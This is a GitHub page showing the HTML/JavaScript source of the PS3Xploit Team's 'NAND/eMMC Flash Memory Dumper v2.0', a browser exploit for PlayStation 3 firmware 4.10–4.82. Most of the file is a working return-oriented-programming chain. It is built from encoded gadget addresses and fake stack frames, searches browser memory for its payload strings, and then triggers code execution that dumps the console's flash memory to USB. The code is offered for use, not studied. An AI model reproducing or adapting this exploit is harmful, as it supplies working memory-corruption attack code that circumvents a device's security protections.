-
Notifications
You must be signed in to change notification settings - Fork 2
/
index_nand.html
216 lines (214 loc) · 15.3 KB
/
index_nand.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
<!DOCTYPE html>
<html>
<script src="ps3xploit_v20.js"></script>
<head>
<meta charset="UTF-8">
<title>PS3Xploit Team - PS3 NAND/eMMC Flash Memory Dumper v2.0</title>
<script>
function initROP()
{
try
{
disable_cb();
disable_btn();
clearLogEntry();
if(t_out!=0){clearTimeout(t_out);t_out=0;}
var fp_root;
var f_off_start=0x0;
if(used_port===1){fp_root=convertString("xxxx/dev_usb001/dump.hex");}
else if(used_port===6){fp_root=convertString("xxxx/dev_usb006/dump.hex");}
else if(used_port===1000){fp_root=convertString("xxxxxxxx/dev_sd/dump.hex");f_off_start=0x4;}
else if(used_port===1001){fp_root=convertString("xxxxxxxx/dev_cf/dump.hex");f_off_start=0x4;}
else if(used_port===1002){fp_root=convertString("xxxxxxxx/dev_ms/dump.hex");f_off_start=0x4;}
else {used_port=0;fp_root=convertString("xxxx/dev_usb000/dump.hex");}
usb_fp_addr=0;
stack_frame_addr=0;
jump_2_addr=0;
jump_1_addr=0;
total_loops++;
var flash_id=0x22;
var flash_flag=0x01000000;
var flash2_flag=0x00000001;
var start_sector=0x0;
var step_sector=0x800;
var ss_read_size=0x200*step_sector;
var file_size_a=128;
var file_size_b=111;
var rosdump_addr=0x83000000;
var search_max_threshold = 70*0x100000;
var search_base=0x80100000;
var search_size=0x200000;
var temp_addr= 0x8C800000;
var readlen_addr=0,dev_handle_addr=0,wb_addr=0,wba_addr=0,sso_addr=0;
var fwrite_mode="wb";
var fwrite_mode_2="a+b";
usb_fp=fp_root+unescape("\u0000")+convertString(fwrite_mode)+unescape("\u0000")+convertString(fwrite_mode_2)+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+unescape("\u4141\u4141\u4141\u4141\uFD7E");
function reload()
{
showResult(hr+"<h1><b>Exploit Initialization..."+br+"<font color=%22000000%22>Progress: "+((100/max_loops)*total_loops).toString()+"%, please wait...</font></b></h1>");
t_out=setTimeout(initROP,1000);
};
function fail()
{
total_loops=0;
showResult(hr+"<h1><b>Exploit Initialization FAILED!</h1><h2><font color=%22000000%22><a href=\"javascript:window.location.reload()\">Refresh this page</a> & try again...</font></b></h2>");
cleanGUI();
usb(used_port);
};
do
{
if(search_max_threshold<search_size){
if(total_loops<max_loops)reload();
else fail();
return;}
usb_fp=usb_fp.replaceAt(0,hexh2bin(0x7EFD));
usb_fp_addr=findJsVariableOffset("usb_fp",usb_fp,search_base,search_size);
search_max_threshold-=search_size;
}while(usb_fp_addr===0);
wb_addr=usb_fp_addr+0x16;
wba_addr=usb_fp_addr+0x1A;
sso_addr=usb_fp_addr+0x1E;
readlen_addr=usb_fp_addr+0x26;
dev_handle_addr=usb_fp_addr+0x2A;
usb_fp_addr+=f_off_start;
function readflash(nloop,stage)
{
var ret,iterator;
for(iterator=0;iterator<nloop;iterator++)
{
ret+=unescape("\uFF00\u0000\u025A\uFF10\uFF10")+hexw2bin(readlen_addr)+hexw2bin(rosdump_addr+(iterator*ss_read_size))+hexw2bin(step_sector)+hexw2bin(start_sector+((iterator+stage)*step_sector))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29")
+unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget5_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304")
+unescape("\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768")
+unescape("\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+(iterator*0x30))+unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget3_addr)+unescape("\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132")
+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980");
}
return ret;
};
stack_frame= unescape("\u4141\u2A2F")+hexw2bin(gadget2_addr)+hexw2bin(toc_addr)+unescape("\u4141\u4141\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u0000\u0000")+hexw2bin(toc_addr)+unescape("\u5152\u5354\u5556\u5758\u5960\u6162\u6364") //64 bytes
+unescape("\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
+unescape("\u2930\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr-0x30)+unescape("\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u0000\u0000")+hexw2bin(gadget3_addr)+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192")
+unescape("\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556")
+unescape("\u5758\u5960\u6162\u0000\u0258\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(sso_addr)+unescape("\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\uFF29\uFF29\uFF29")
+unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr-0x60)+unescape("\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u0000\u0000")+hexw2bin(gadget4_addr)+unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384")
+unescape("\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u8586\u8788")
+unescape("\u8990\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566")+hexw2bin(flash_flag)+hexw2bin(flash2_flag)+unescape("\u7576\u7778\u7980\u8182\u0000\u0000")+hexw2bin(gadget3_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112")
+unescape("\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\uFF00")
+readflash(file_size_a,0)
+unescape("\u0506\uFF11\uFF11\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07\uFF06\uFF06\uFF05\uFF05")+hexw2bin(wb_addr)+hexw2bin(usb_fp_addr)+unescape("\uFF09\uFF09\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000")+hexw2bin(file_size_a*ss_read_size)+unescape("\u0000\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000")+hexw2bin(usb_fp_addr)
+unescape("\u8384\u8586\u8788\u8990\uF10F\u9394\u9596\u9798\u0000\u0000\u0001\u3B74\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344")
+unescape("\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000\uFF31")
+unescape("\uFF31\uF00F\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970")
+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334")
+unescape("\u3536\u3738\u3940\u4142\u4344\u0000\u0000")+hexw2bin(temp_addr+0xA100)+unescape("\u0000\u0000\u3536\u3738\u0000\u0000")+hexw2bin(temp_addr+0xA200)+unescape("\uF00F\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u0000\u0000")+hexw2bin(gadget3_addr)
+unescape("\uF00F\u0506\u0000\u0259\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u0000\u0000\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000\uFF29\uFF29\u0000\u0000\uFF30\uFF30")
+readflash(file_size_b,file_size_a)
+unescape("\u0506\u0000\u0259\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u0000\u0000\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000\uFF29\uFF29\u0000\u0000\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
+unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(gadget5_addr)+unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324")
+unescape("\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u0000\u0000")+hexw2bin(temp_addr+0xA300)
+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0000\u0000")+hexw2bin(gadget3_addr)+unescape("\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152")
+unescape("\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\uFF11\uFF11\uFF10\uFF10\uFF08")
+unescape("\uFF08\uFF07\uFF07\uFF06\uFF06\uFF05\uFF05")+hexw2bin(wba_addr)+unescape("\uFF03\uFF03\uFF09\uFF09\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000")+hexw2bin(file_size_b*ss_read_size)+unescape("\u0000\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000")+hexw2bin(usb_fp_addr)
+unescape("\u8384\u8586\u8788\u8990\uF10F\u9394\u9596\u9798\u0000\u0000\u0001\u3B74\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344")
+unescape("\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000\uFF31")
+unescape("\uFF31\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970")
+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334")
+unescape("\u3536\u3738\u3940\u4142\u4344\u0000\u0000")+hexw2bin(temp_addr+0xA400)+unescape("\u0000\u0000\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr+0xA500)+unescape("\u0000\u0000")
+hexw2bin(sp_exit)+unescape("\u9900\u0102\u0304\u0506\u0000\u0000")+hexw2bin(gadget8_addr)+unescape("\u2F2A");
do
{
if(search_max_threshold<search_size){
if(total_loops<max_loops)reload();
else fail();
return;}
stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+0x200000,search_size);
search_max_threshold-=search_size;
}while(stack_frame_addr===0);
jump_2=unescape("\u0102\u7EFB\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950")
+hexw2bin(stack_frame_addr)+unescape("\uFB7E");
do
{
if(search_max_threshold<search_size){
if(total_loops<max_loops)reload();
else fail();
return;}
jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);
search_max_threshold-=search_size;
}while(jump_2_addr===0);
jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
do
{
if(search_max_threshold<search_size){
if(total_loops<max_loops)reload();
else fail();
return;}
jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);
search_max_threshold-=search_size;
}while(jump_1_addr===0);
var u=checkMemory(usb_fp_addr-0x4,0x100,usb_fp.length);
var j2=checkMemory(jump_2_addr-0x4,0x100,jump_2.length);
var j1=checkMemory(jump_1_addr-0x4,0x100,jump_1.length);
if((j2===jump_2)&&(j1===jump_1)&&(u===usb_fp))
{
if(t_out!=0){clearTimeout(t_out);}
showResult("<hr><h1><b><font color=%22386E38%22>Exploit Initialization SUCCESS...!</font></b></h1><h3><b><font color=%22000000%22>You can now proceed to dump the NAND Flash Memory to USB/Card!</font></b></h3>");
enable_trigger();
}
else
{
logAdd("String mismatch in memory!");
if(total_loops<max_loops)reload();
else fail();
}
}
catch(e)
{
debug=true;
logAdd(br+"Exploit initialization failed because the following exception was thrown during execution:"+br+e);
debug=false;
}
}
function triggerX()
{
clearLogEntry();
showResult("<hr><h1><b>Proceeding to dump 239Mb NAND Flash Memory to USB/Card device...</b></h1><h3><b><font color=%22000000%22>Please wait, the dump operation takes about 15 to 25 minutes!</font></b></h3>");
disable_cb();
disable_btn();
setTimeout(trigger,1000,jump_1_addr);
setTimeout(success,2000,"<hr><h1><b><font color=%22386E38%22>NAND Flash dump operation completed..!</font></b></h1><h3><b><font color=%22000000%22>Check your USB device for dump.hex...</font></b></h3>");
}
</script>
</head>
<body id="BodyID" bgcolor="#FFD097">
<div id="HeaderID" style="color:#CC2010">
<h1>PS3 NAND/eMMC Flash Memory Dumper v2.0</h1>
<h4><font color="#000000">by PS3Xploit Team: </font></h2><b> W | esc0rtd3w | habib | bguerville</b></font><hr></h4>
<h4><font color="#000000">v2.0 Update crafted by: </font><b> bguerville</b> (ROP, Javascript & Debugging) | <b>esc0rtd3w</b> (Debugging & Testing)<hr></h4>
<font color="#000000">Many thanks to xerpi for the userland memory leak exploit ps3 port, zecoxao & Joonie for their early & continued support, mysis for documenting vsh exports & plugins, the psdevwiki contributors of course, STLcardsWS for his long standing contribution & all ps3 community hackers/devs past & present, you know who you are...<hr>
<font color="#CC2010">
<h3>Supports OFW and CFW CEX Firmware versions 4.10 to 4.82<br>
Supports OFW and CFW DEX Firmware version 4.81<br>
Supports Phat Models Axx/Bxx/Cxx/Exx/Gxx<br>
Supports SuperSlim Models 4xxx-A</h3>
</font>
Instructions/additional details & news on <a href="http://www.psx-place.com/forums/PS3Xploit">http://www.psx-place.com/forums/PS3Xploit</a><br></font>
<hr>
</div>
<font color="#CC2010"><b><i>Dump file path:</i></b></font><br><br>/dev_usb000/dump.hex<input type="checkbox" id="usb0" name="/dev_usb000" onclick="usb(0);" checked/> | /dev_usb001/dump.hex<input type="checkbox" id="usb1" name="/dev_usb001" onclick="usb(1);"/> | /dev_usb006/dump.hex<input type="checkbox" id="usb6" name="/dev_usb006" onclick="usb(6);"/> <button id="btnReset" type="button" onclick="resetOptions(true);">Reset Path Options</button>
<br>/dev_sd/dump.hex<input type="checkbox" id="sd" name="/dev_sd" onclick="usb(1000);"/> | /dev_cf/dump.hex<input type="checkbox" id="cf" name="/dev_cf" onclick="usb(1001);"/> | /dev_ms/dump.hex<input type="checkbox" id="ms" name="/dev_ms" onclick="usb(1002);"/><br><br>
<button id="btnROP" type="button" onclick="initROP();" autofocus>Initialize exploitation</button><span id="dex_txt" style="visibility:hidden"> DEX mode<input type="checkbox" id="dex" name="DEX" disabled="true" onclick="dex();"/></span>
<br><br><button id="btnTrigger" disabled="true" type="button" onclick="triggerX();">Dump 239Mb NAND to USB/Card device</button>
<div id="result" style="color:#CC2010"></div><br>
<div id="log"></div>
<div id="exploit" ></div>
<div id="trigger"></div>
<div id="footer" style="color:#000000"></div>
<script type="text/javascript" >
max_loops=10;
writeEnvInfo();
ps3chk();
</script>
</body>
</html>